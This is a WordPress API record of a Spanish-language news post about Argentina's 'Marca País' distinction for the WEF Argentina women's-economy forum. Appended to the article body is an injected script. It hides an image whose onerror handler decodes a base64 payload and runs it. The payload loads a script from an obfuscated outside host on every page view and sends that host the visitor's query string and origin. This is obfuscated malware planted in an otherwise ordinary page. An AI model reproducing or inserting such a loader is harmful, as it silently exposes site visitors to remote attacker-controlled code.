{"id":5621,"date":"2022-08-04T13:41:40","date_gmt":"2022-08-04T16:41:40","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=5621"},"modified":"2025-08-13T16:15:34","modified_gmt":"2025-08-13T19:15:34","slug":"marca-pais-se-entrego-una-distincion-a-la-wef-argentina","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=5621","title":{"rendered":"Marca Pa\u00eds: se entreg\u00f3 una distinci\u00f3n a la WEF Argentina"},"content":{"rendered":"\n<h3 class=\"has-white-color has-vivid-cyan-blue-background-color has-text-color has-background wp-block-heading\"><em>Por ser el \u00fanico foro mundial enfocado en la econom\u00eda de la mujer.<\/em><\/h3>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/08\/Captura-web_4-8-2022_133931_www.argentina.gob_.ar_.jpeg\"><img decoding=\"async\" width=\"1024\" height=\"288\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/08\/Captura-web_4-8-2022_133931_www.argentina.gob_.ar_-1024x288.jpeg\" alt=\"\" class=\"wp-image-5622\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/08\/Captura-web_4-8-2022_133931_www.argentina.gob_.ar_-1024x288.jpeg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/08\/Captura-web_4-8-2022_133931_www.argentina.gob_.ar_-300x84.jpeg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/08\/Captura-web_4-8-2022_133931_www.argentina.gob_.ar_-768x216.jpeg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/08\/Captura-web_4-8-2022_133931_www.argentina.gob_.ar_-1536x433.jpeg 1536w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/08\/Captura-web_4-8-2022_133931_www.argentina.gob_.ar_-696x196.jpeg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/08\/Captura-web_4-8-2022_133931_www.argentina.gob_.ar_-1068x301.jpeg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/08\/Captura-web_4-8-2022_133931_www.argentina.gob_.ar_-1491x420.jpeg 1491w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/08\/Captura-web_4-8-2022_133931_www.argentina.gob_.ar_.jpeg 1722w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n\n\n\n<p>La secretaria de Promoci\u00f3n Tur\u00edstica de la Naci\u00f3n,&nbsp;<strong>Yanina Mart\u00ednez<\/strong>, entreg\u00f3 a la WEF Argentina (World Economic Forum) la distinci\u00f3n de evento Marca Pa\u00eds por ser el \u00fanico foro mundial enfocado en la econom\u00eda de la mujer. En el a\u00f1o 2020 se realiz\u00f3 la primera edici\u00f3n en nuestro pa\u00eds y regresar\u00e1 este a\u00f1o, del 17 al 18 de octubre.<\/p>\n\n\n\n<p><em>\u00abEs una gran alegr\u00eda distinguir a un evento que promueve el federalismo y que muestra nuestros atractivos, cultura y gastronom\u00eda a las m\u00e1s de veinte delegaciones internacionales que participan desde distintas partes del mundo\u00bb<\/em>, manifest\u00f3&nbsp;<strong>Mart\u00ednez<\/strong>.<\/p>\n\n\n\n<p>Asimismo, en el encuentro tambi\u00e9n se convers\u00f3 sobre las acciones a realizar en conjunto, teniendo como ejes el desarrollo econ\u00f3mico post pandemia, las nuevas econom\u00edas, el desarrollo financiero de la mujer, las nuevas tecnolog\u00edas y el g\u00e9nero, el cambio clim\u00e1tico y la sostenibilidad.<\/p>\n\n\n\n<p>La&nbsp;<a href=\"https:\/\/www.argentina.gob.ar\/turismoydeportes\/marca-pais\">Marca Pa\u00eds Argentina<\/a>&nbsp;es una pol\u00edtica de Estado que busca posicionar a nuestro pa\u00eds en el contexto internacional mediante sus factores diferenciales, sus tradiciones, su cultura, sus productos, entre otros.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><a href=\"https:\/\/www.argentina.gob.ar\/noticias\/marca-pais-se-entrego-una-distincion-la-wef-argentina\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" width=\"630\" height=\"92\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/07\/Captura-web_26-6-2022_203038_www.argentina.gob_.ar_.jpeg\" alt=\"\" class=\"wp-image-5537\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/07\/Captura-web_26-6-2022_203038_www.argentina.gob_.ar_.jpeg 630w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/07\/Captura-web_26-6-2022_203038_www.argentina.gob_.ar_-300x44.jpeg 300w\" sizes=\"(max-width: 630px) 100vw, 630px\" \/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Por ser el \u00fanico foro mundial enfocado en la econom\u00eda de la mujer. La secretaria de Promoci\u00f3n Tur\u00edstica de la Naci\u00f3n,&nbsp;Yanina Mart\u00ednez, entreg\u00f3 a la WEF Argentina (World Economic Forum) la distinci\u00f3n de evento Marca Pa\u00eds por ser el \u00fanico foro mundial enfocado en la econom\u00eda de la mujer. En el a\u00f1o 2020 se realiz\u00f3 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":5623,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-5621","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-argentina"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5621","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5621"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5621\/revisions"}],"predecessor-version":[{"id":10614,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5621\/revisions\/10614"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/5623"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5621"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5621"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5621"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}